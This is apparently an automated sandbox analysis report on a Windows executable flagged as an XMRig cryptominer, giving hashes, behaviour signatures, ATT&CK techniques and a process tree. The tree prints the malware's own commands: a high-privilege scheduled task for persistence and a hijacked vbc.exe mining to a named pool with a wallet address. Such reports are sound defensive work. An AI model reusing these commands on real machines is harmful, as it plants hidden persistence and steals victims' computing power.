Analysis

  • max time kernel
    79s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 20:24

General

  • Target

    0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe

  • Size

    833KB

  • MD5

    e94daf09612a7fa6491ff9ff47cd8cae

  • SHA1

    fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

  • SHA256

    0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

  • SHA512

    4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

  • SSDEEP

    6144:o2j7MpEXhM4uccEV0SvafIxRT3ChsYwSZpji1X+i22Usn3tezndwI/VLuwUUblRB:X5ucdV0LoSf2+VI3EhHPZR7F

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe
    "C:\Users\Admin\AppData\Local\Temp\0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4912
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD6EC.tmp.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:1180
      • C:\ProgramData\system32\JW.exe
        "C:\ProgramData\system32\JW.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:400
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JW" /tr "C:\ProgramData\system32\JW.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JW" /tr "C:\ProgramData\system32\JW.exe"
            5⤵
            • Creates scheduled task(s)
            PID:2024
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 47UkNrHRk4agJcyuYKGhvY4UPDJPELWo3T99w2bjnPGzSrhqXr9fwr6UwxKNSmVuc68LF1yhcqUqoSnCZBwK6WE9Lokat8v -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1008

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scripting

1
T1064

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Scripting

1
T1064

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\system32\JW.exe
    Filesize

    833KB

    MD5

    e94daf09612a7fa6491ff9ff47cd8cae

    SHA1

    fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

    SHA256

    0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

    SHA512

    4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

  • C:\ProgramData\system32\JW.exe
    Filesize

    833KB

    MD5

    e94daf09612a7fa6491ff9ff47cd8cae

    SHA1

    fa0abf6e1bfa33f2f180b2fad4928cbadeb7f014

    SHA256

    0c78984cd2afe869307aca9d8dc9d257f650616b12fa45a2a79a83821f1e7b37

    SHA512

    4a2279b7c1c5eed840d8056b585962dea818cd4e5454f42a0caf9b1c56ba06a892acce77dbc6b0598e46f83e6ecb376d2ea42d7b5b15877536bfa31c340dc73a

  • C:\Users\Admin\AppData\Local\Temp\tmpD6EC.tmp.bat
    Filesize

    139B

    MD5

    7f51ae9772e4a8b18e39b6bb33528869

    SHA1

    ff96ec3f82eb432f91a5f46243434b328b03ed2e

    SHA256

    2eb354ee1793909769132d84b7c195ce2c179ff8f454c64b0f679d4a4976d3db

    SHA512

    3bd0b6e81175923e069e9bcde3e2123274e1f97bda4a545e82025363b2f8d0b3446cc8a316a3053a64c9cd60e56a9a620a7c01ad0024b08abf2c2d40c917ee80

  • memory/400-151-0x00007FFA06A20000-0x00007FFA074E1000-memory.dmp
    Filesize

    10.8MB

  • memory/400-149-0x00007FFA06A20000-0x00007FFA074E1000-memory.dmp
    Filesize

    10.8MB

  • memory/400-140-0x00007FFA06A20000-0x00007FFA074E1000-memory.dmp
    Filesize

    10.8MB

  • memory/400-137-0x0000000000000000-mapping.dmp
  • memory/1008-147-0x00000199C8F10000-0x00000199C8F30000-memory.dmp
    Filesize

    128KB

  • memory/1008-146-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1008-154-0x00000199CA910000-0x00000199CA930000-memory.dmp
    Filesize

    128KB

  • memory/1008-153-0x00000199CA910000-0x00000199CA930000-memory.dmp
    Filesize

    128KB

  • memory/1008-144-0x0000000140343234-mapping.dmp
  • memory/1008-143-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1008-145-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1008-152-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1008-150-0x00000199CA8D0000-0x00000199CA910000-memory.dmp
    Filesize

    256KB

  • memory/1008-148-0x0000000140000000-0x00000001407C9000-memory.dmp
    Filesize

    7.8MB

  • memory/1180-135-0x0000000000000000-mapping.dmp
  • memory/2024-142-0x0000000000000000-mapping.dmp
  • memory/2264-141-0x0000000000000000-mapping.dmp
  • memory/2432-133-0x0000000000000000-mapping.dmp
  • memory/4912-132-0x0000000000AA0000-0x0000000000B74000-memory.dmp
    Filesize

    848KB

  • memory/4912-136-0x00007FFA06FA0000-0x00007FFA07A61000-memory.dmp
    Filesize

    10.8MB